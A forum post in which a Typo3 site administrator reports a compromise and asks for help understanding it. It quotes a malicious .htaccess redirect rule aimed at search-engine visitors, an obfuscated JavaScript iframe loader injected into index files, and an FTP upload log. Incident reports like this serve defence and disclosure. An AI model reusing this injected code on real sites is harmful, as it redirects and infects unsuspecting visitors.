Malicious code on a Typo3 web portal

Hello everyone!
For a web portal based on Typo3 that I maintain, Google recently issued a malware warning in Webmaster Tools.
And lo and behold, this is what I found:
The .htaccess had been extended with the following lines:
Code:
#2b8c75#
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteCond %{HTTP_REFERER} ^.*(abacho|abizdirectory|about|acoon|alexana|allesklar|allpages|allthesites|alltheuk|alltheweb|altavista|america|amfibi|aol|apollo7|aport|arcor|ask|atsearch|baidu|bellnet|bestireland|bhanvad|bing|blog|bluewin|botw|brainysearch|bricabrac|browseireland|chapu|claymont|click4choice|clickey|clickz|clush|confex|cyber-content|daffodil|devaro|dmoz|dogpile|ebay|ehow|eniro|entireweb|euroseek|exalead|excite|express|facebook|fastbot|filesearch|findelio|findhow|finditireland|findloo|findwhat|finnalle|finnfirma|fireball|flemiro|flickr|freenet|friendsreunited|galaxy|gasta|gigablast|gimpsy|globalsearchdirectory|goo|google|goto|gulesider|hispavista|hotbot|hotfrog|icq|iesearch|ilse|infoseek|ireland-information|ixquick|jaan|jayde|jobrapido|kataweb|keyweb|kingdomseek|klammeraffe|km|kobala|kompass|kpnvandaag|kvasir|libero|limier|linkedin|live|liveinternet|lookle|lycos|mail|mamma|metabot|metacrawler|metaeureka|mojeek|msn|myspace|netscape|netzindex|nigma|nlsearch|nol9|oekoportal|openstat|orange|passagen|pocketflier|qp|qq|rambler|rtl|savio|schnellsuche|search|search-belgium|searchers|searchspot|sfr|sharelook|simplyhired|slider|sol|splut|spray|startpagina|startsiden|sucharchiv|suchbiene|suchbot|suchknecht|suchmaschine|suchnase|sympatico|telfort|telia|teoma|terra|the-arena|thisisouryear|thunderstone|tiscali|t-online|topseven|twitter|ukkey|uwe|verygoodsearch|vkontakte|voila|walhello|wanadoo|web|webalta|web-archiv|webcrawler|websuche|westaustraliaonline|wikipedia|wisenut|witch|wolong|ya|yahoo|yandex|yell|yippy|youtube|zoneru)\.(.*)
RewriteRule ^(.*)$ hxxp://212.227.7.91/easydox/count.php [R=301,L]
</IfModule>
#/2b8c75#

In addition, the following JS code was inserted into some index.php or index.html files:
Code:
<?
#2b8c75#
echo "<script type=\"text/javascript\" language=\"javascript\" >
sp=\"split\";aq=\"0\"+\"x\";w=window;ff=String;z=\"y\";ff=ff.fromCharCode;try{document[\"\x62od\"+z]++}catch(d21vd12v){v=123;vzs=false;try{document;}catch(wb){vzs=2;}if(!vzs)e=w[\"eval\"];if(1){f=\"17,5d,6c,65,5a,6b,60,66,65,17,71,71,71,5d,5d,5d,1f,20,17,72,4,1,17,6d,58,69,17,6b,17,34,17,5b,66,5a,6c,64,5c,65,6b,25,5a,69,5c,58,6b,5c,3c,63,5c,64,5c,65,6b,1f,1e,60,5d,69,58,64,5c,1e,20,32,4,1,4,1,17,6b,25,6a,69,5a,17,34,17,1e,5f,6b,6b,67,31,26,26,64,5e,6d,25,5e,58,69,59,5c,5a,62,25,5b,5c,26,5c,6a,5b,25,67,5f,67,1e,32,4,1,17,6b,25,6a,6b,70,63,5c,25,67,66,6a,60,6b,60,66,65,17,34,17,1e,58,59,6a,66,63,6c,6b,5c,1e,32,4,1,17,6b,25,6a,6b,70,63,5c,25,59,66,69,5b,5c,69,17,34,17,1e,27,1e,32,4,1,17,6b,25,6a,6b,70,63,5c,25,5f,5c,60,5e,5f,6b,17,34,17,1e,28,67,6f,1e,32,4,1,17,6b,25,6a,6b,70,63,5c,25,6e,60,5b,6b,5f,17,34,17,1e,28,67,6f,1e,32,4,1,17,6b,25,6a,6b,70,63,5c,25,63,5c,5d,6b,17,34,17,1e,28,67,6f,1e,32,4,1,17,6b,25,6a,6b,70,63,5c,25,6b,66,67,17,34,17,1e,28,67,6f,1e,32,4,1,4,1,17,60,5d,17,1f,18,5b,66,5a,6c,64,5c,65,6b,25,5e,5c,6b,3c,63,5c,64,5c,65,6b,39,70,40,5b,1f,1e,6b,1e,20,20,17,72,4,1,17,5b,66,5a,6c,64,5c,65,6b,25,6e,69,60,6b,5c,1f,1e,33,5b,60,6d,17,60,5b,34,53,1e,6b,53,1e,35,33,26,5b,60,6d,35,1e,20,32,4,1,17,5b,66,5a,6c,64,5c,65,6b,25,5e,5c,6b,3c,63,5c,64,5c,65,6b,39,70,40,5b,1f,1e,6b,1e,20,25,58,67,67,5c,65,5b,3a,5f,60,63,5b,1f,6b,20,32,4,1,17,74,4,1,74,4,1,5d,6c,65,5a,6b,60,66,65,17,4a,5c,6b,3a,66,66,62,60,5c,1f,5a,66,66,62,60,5c,45,58,64,5c,23,5a,66,66,62,60,5c,4d,58,63,6c,5c,23,65,3b,58,70,6a,23,67,58,6b,5f,20,17,72,4,1,17,6d,58,69,17,6b,66,5b,58,70,17,34,17,65,5c,6e,17,3b,58,6b,5c,1f,20,32,4,1,17,6d,58,69,17,5c,6f,67,60,69,5c,17,34,17,65,5c,6e,17,3b,58,6b,5c,1f,20,32,4,1,17,60,5d,17,1f,65,3b,58,70,6a,34,34,65,6c,63,63,17,73,73,17,65,3b,58,70,6a,34,34,27,20,17,65,3b,58,70,6a,34,28,32,4,1,17,5c,6f,67,60,69,5c,25,6a,5c,6b,4b,60,64,5c,1f,6b,66,5b,58,70,25,5e,5c,6b,4b,60,64,5c,1f,20,17,22,17,2a,2d,27,27,27,27,27,21,29,2b,21,65,3b,58,70,6a,20,32,4,1,17,5b,66,5a,6c,64,5c,65
,6b,25,5a,66,66,62,60,5c,17,34,17,5a,66,66,62,60,5c,45,58,64,5c,22,19,34,19,22,5c,6a,5a,58,67,5c,1f,5a,66,66,62,60,5c,4d,58,63,6c,5c,20,4,1,17,22,17,19,32,5c,6f,67,60,69,5c,6a,34,19,17,22,17,5c,6f,67,60,69,5c,25,6b,66,3e,44,4b,4a,6b,69,60,65,5e,1f,20,17,22,17,1f,1f,67,58,6b,5f,20,17,36,17,19,32,17,67,58,6b,5f,34,19,17,22,17,67,58,6b,5f,17,31,17,19,19,20,32,4,1,74,4,1,5d,6c,65,5a,6b,60,66,65,17,3e,5c,6b,3a,66,66,62,60,5c,1f,17,65,58,64,5c,17,20,17,72,4,1,17,6d,58,69,17,6a,6b,58,69,6b,17,34,17,5b,66,5a,6c,64,5c,65,6b,25,5a,66,66,62,60,5c,25,60,65,5b,5c,6f,46,5d,1f,17,65,58,64,5c,17,22,17,19,34,19,17,20,32,4,1,17,6d,58,69,17,63,5c,65,17,34,17,6a,6b,58,69,6b,17,22,17,65,58,64,5c,25,63,5c,65,5e,6b,5f,17,22,17,28,32,4,1,17,60,5d,17,1f,17,1f,17,18,6a,6b,58,69,6b,17,20,17,1d,1d,4,1,17,1f,17,65,58,64,5c,17,18,34,17,5b,66,5a,6c,64,5c,65,6b,25,5a,66,66,62,60,5c,25,6a,6c,59,6a,6b,69,60,65,5e,1f,17,27,23,17,65,58,64,5c,25,63,5c,65,5e,6b,5f,17,20,17,20,17,20,4,1,17,72,4,1,17,69,5c,6b,6c,69,65,17,65,6c,63,63,32,4,1,17,74,4,1,17,60,5d,17,1f,17,6a,6b,58,69,6b,17,34,34,17,24,28,17,20,17,69,5c,6b,6c,69,65,17,65,6c,63,63,32,4,1,17,6d,58,69,17,5c,65,5b,17,34,17,5b,66,5a,6c,64,5c,65,6b,25,5a,66,66,62,60,5c,25,60,65,5b,5c,6f,46,5d,1f,17,19,32,19,23,17,63,5c,65,17,20,32,4,1,17,60,5d,17,1f,17,5c,65,5b,17,34,34,17,24,28,17,20,17,5c,65,5b,17,34,17,5b,66,5a,6c,64,5c,65,6b,25,5a,66,66,62,60,5c,25,63,5c,65,5e,6b,5f,32,4,1,17,69,5c,6b,6c,69,65,17,6c,65,5c,6a,5a,58,67,5c,1f,17,5b,66,5a,6c,64,5c,65,6b,25,5a,66,66,62,60,5c,25,6a,6c,59,6a,6b,69,60,65,5e,1f,17,63,5c,65,23,17,5c,65,5b,17,20,17,20,32,4,1,74,4,1,60,5d,17,1f,65,58,6d,60,5e,58,6b,66,69,25,5a,66,66,62,60,5c,3c,65,58,59,63,5c,5b,20,4,1,72,4,1,60,5d,1f,3e,5c,6b,3a,66,66,62,60,5c,1f,1e,6d,60,6a,60,6b,5c,5b,56,6c,68,1e,20,34,34,2c,2c,20,72,74,5c,63,6a,5c,72,4a,5c,6b,3a,66,66,62,60,5c,1f,1e,6d,60,6a,60,6b,5c,5b,56,6c,68,1e,23,17,1e,2c,2c,1e,23,17,1e,28,1e,23,17,1e,26,1e,20,32,4,1,4,1,71,71,71,5d,5d,5d,1f,20,32,4,1,74,4,1,74,4,1\"[sp](\",\");}
w=f;s=[];for(i=2-2;-i+1291!=0;i+=1){j=i;if((0x19==031))if(e)s=s+ff(e(aq+(w[j]))+0xa-01);}za=e;za(s)}</script>";
#/2b8c75#
?>

The injection was apparently done via FTP; here is an excerpt from an FTP log:
Code:
Sat Jun 1 12:00:23 2013 1 92.243.20.41 4712 /html/index.html.backup a _ i r ***FTP-BENUTZER2*** ftp 0 * c
Sat Jun 1 12:00:23 2013 1 85.158.181.24 5622 /***Zensiert***//index.html a _ i r ***FTP-BENUTZER1*** ftp 0 * c
Sat Jun 1 12:00:23 2013 1 85.158.181.24 5622 /***Zensiert***//index.html a _ i r ***FTP-BENUTZER1*** ftp 0 * c
Sat Jun 1 12:00:23 2013 1 92.243.20.41 4712 /html/index.html.backup a _ i r ***FTP-BENUTZER2*** ftp 0 * c
Sat Jun 1 12:00:23 2013 1 92.243.20.41 4650 /html///fileadmin/_temp_/index.html a _ i r ***FTP-BENUTZER2*** ftp 0 * c
Sat Jun 1 12:00:23 2013 1 85.158.181.24 5994 /***Zensiert***/adressverwaltung/index.php a _ i r ***FTP-BENUTZER1*** ftp 0 * c
Sat Jun 1 12:00:23 2013 1 92.243.20.41 4650 /html///fileadmin/_temp_/index.html a _ i r ***FTP-BENUTZER2*** ftp 0 * c
Sat Jun 1 12:00:23 2013 1 85.158.181.24 5994 /***Zensiert***/adressverwaltung/index.php a _ i r ***FTP-BENUTZER1*** ftp 0 * c
Sat Jun 1 12:00:24 2013 1 92.243.20.41 6234 /html///***Zensiert***/msd1.23/index.php a _ i r ***FTP-BENUTZER2*** ftp 0 * c
Sat Jun 1 12:00:24 2013 1 85.158.181.24 4731 /***Zensiert***/adressverwaltung/adm_my_files/index.html a _ i r ***FTP-BENUTZER1*** ftp 0 * c
Sat Jun 1 12:00:24 2013 1 92.243.20.41 6234 /html///***Zensiert***/msd1.23/index.php a _ i r ***FTP-BENUTZER2*** ftp 0 * c
Sat Jun 1 12:00:24 2013 1 85.158.181.24 4731 /***Zensiert***/adressverwaltung/adm_my_files/index.html a _ i r ***FTP-BENUTZER1*** ftp 0 * c
Sat Jun 1 12:00:24 2013 1 92.243.20.41 32295 /html///***Zensiert***/msd1.23/main.php a _ i r ***FTP-BENUTZER2*** ftp 0 * c
Sat Jun 1 12:00:24 2013 1 85.158.181.24 23671 /***Zensiert***/adressverwaltung/adm_program/index.php a _ i r ***FTP-BENUTZER1*** ftp 0 * c
Sat Jun 1 12:00:25 2013 1 92.243.20.41 32295 /html///***Zensiert***/msd1.23/main.php a _ i r ***FTP-BENUTZER2*** ftp 0 * c
Sat Jun 1 12:00:25 2013 1 85.158.181.24 23671 /***Zensiert***/adressverwaltung/adm_program/index.php a _ i r ***FTP-BENUTZER1*** ftp 0 * c
Sat Jun 1 12:00:27 2013 1 92.243.20.41 5963 /html///***Zensiert***/msd1.23/inc/footer.php a _ i r ***FTP-BENUTZER2*** ftp 0 * c
Sat Jun 1 12:00:27 2013 1 85.158.181.24 4686 /***Zensiert***/adressverwaltung/adm_program/administration/index.html a _ i r ***FTP-BENUTZER1*** ftp 0 * c
Sat Jun 1 12:00:27 2013 1 92.243.20.41 5963 /html///***Zensiert***/msd1.23/inc/footer.php a _ i r ***FTP-BENUTZER2*** ftp 0 * c
Sat Jun 1 12:00:27 2013 1 85.158.181.24 4686 /***Zensiert***/adressverwaltung/adm_program/administration/index.html a _ i r ***FTP-BENUTZER1*** ftp 0 * c
Sat Jun 1 12:00:27 2013 1 92.243.20.41 6009 /html///***Zensiert***/msd1.23/inc/header.php a _ i r ***FTP-BENUTZER2*** ftp 0 * c
Sat Jun 1 12:00:27 2013 1 85.158.181.24 4686 /***Zensiert***/adressverwaltung/adm_program/libs/index.html a _ i r ***FTP-BENUTZER1*** ftp 0 * c
Sat Jun 1 12:00:27 2013 1 92.243.20.41 6009 /html///***Zensiert***/msd1.23/inc/header.php a _ i r ***FTP-BENUTZER2*** ftp 0 * c
Sat Jun 1 12:00:27 2013 1 85.158.181.24 4686 /***Zensiert***/adressverwaltung/adm_program/libs/index.html a _ i r ***FTP-BENUTZER1*** ftp 0 * c
Sat Jun 1 12:00:28 2013 1 92.243.20.41 8204 /html///typo3_src-4.5.0/index.php a _ i r ***FTP-BENUTZER2*** ftp 0 * c
Sat Jun 1 12:00:28 2013 1 85.158.181.24 4758 /***Zensiert***/adressverwaltung/adm_program/modules/index.html a _ i r ***FTP-BENUTZER1*** ftp 0 * c
Sat Jun 1 12:00:28 2013 1 85.158.181.24 4758 /***Zensiert***/adressverwaltung/adm_program/modules/index.html a _ i r ***FTP-BENUTZER1*** ftp 0 * c
Sat Jun 1 12:00:28 2013 1 92.243.20.41 8204 /html///typo3_src-4.5.0/index.php a _ i r ***FTP-BENUTZER2*** ftp 0 * c
Sat Jun 1 12:00:28 2013 1 85.158.181.24 4686 /***Zensiert***/adressverwaltung/adm_program/system/index.html a _ i r ***FTP-BENUTZER1*** ftp 0 * c
Sat Jun 1 12:00:28 2013 1 92.243.20.41 46333 /html///typo3_src-4.5.0/t3lib/class.t3lib_refindex.php a _ i r ***FTP-BENUTZER2*** ftp 0 * c
Sat Jun 1 12:00:28 2013 1 85.158.181.24 4686 /***Zensiert***/adressverwaltung/adm_program/system/index.html a _ i r ***FTP-BENUTZER1*** ftp 0 * c
Sat Jun 1 12:00:28 2013 1 92.243.20.41 46333 /html///typo3_src-4.5.0/t3lib/class.t3lib_refindex.php a _ i r ***FTP-BENUTZER2*** ftp 0 * c
Sat Jun 1 12:00:29 2013 1 85.158.181.24 9898 /***Zensiert***/adressverwaltung/adm_program/system/login.php a _ i r ***FTP-BENUTZER1*** ftp 0 * c
Sat Jun 1 12:00:29 2013 1 85.158.181.24 9898 /***Zensiert***/adressverwaltung/adm_program/system/login.php a _ i r ***FTP-BENUTZER1*** ftp 0 * c
Sat Jun 1 12:00:29 2013 1 92.243.20.41 317672 /html///typo3_src-4.5.0/t3lib/class.t3lib_tcemain.php a _ i r ***FTP-BENUTZER2*** ftp 0 * c
Sat Jun 1 12:00:29 2013 1 92.243.20.41 317672 /html///typo3_src-4.5.0/t3lib/class.t3lib_tcemain.php a _ i r ***FTP-BENUTZER2*** ftp 0 * c
Sat Jun 1 12:00:31 2013 1 85.158.181.24 6065 /***Zensiert***/adressverwaltung/adm_program/system/overall_footer.php a _ i r ***FTP-BENUTZER1*** ftp 0 * c
Sat Jun 1 12:00:31 2013 1 92.243.20.41 4697 /html///typo3_src-4.5.0/t3lib/index.html a _ i r ***FTP-BENUTZER2*** ftp 0 * c
Sat Jun 1 12:00:31 2013 1 85.158.181.24 6065 /***Zensiert***/adressverwaltung/adm_program/system/overall_footer.php a _ i r ***FTP-BENUTZER1*** ftp 0 * c

Of course I immediately changed all FTP passwords and removed the malicious code from the .htaccess file and from all the other affected files.
In the meantime I have also performed a Typo3 update, including all extensions.
The question for me now is: how could the FTP access have been used? A security hole in (admittedly outdated) Typo3 or in the extensions?
What exactly did the code do? The .htaccess part is clear, but the other code?
Thanks in advance for your help,
jojoho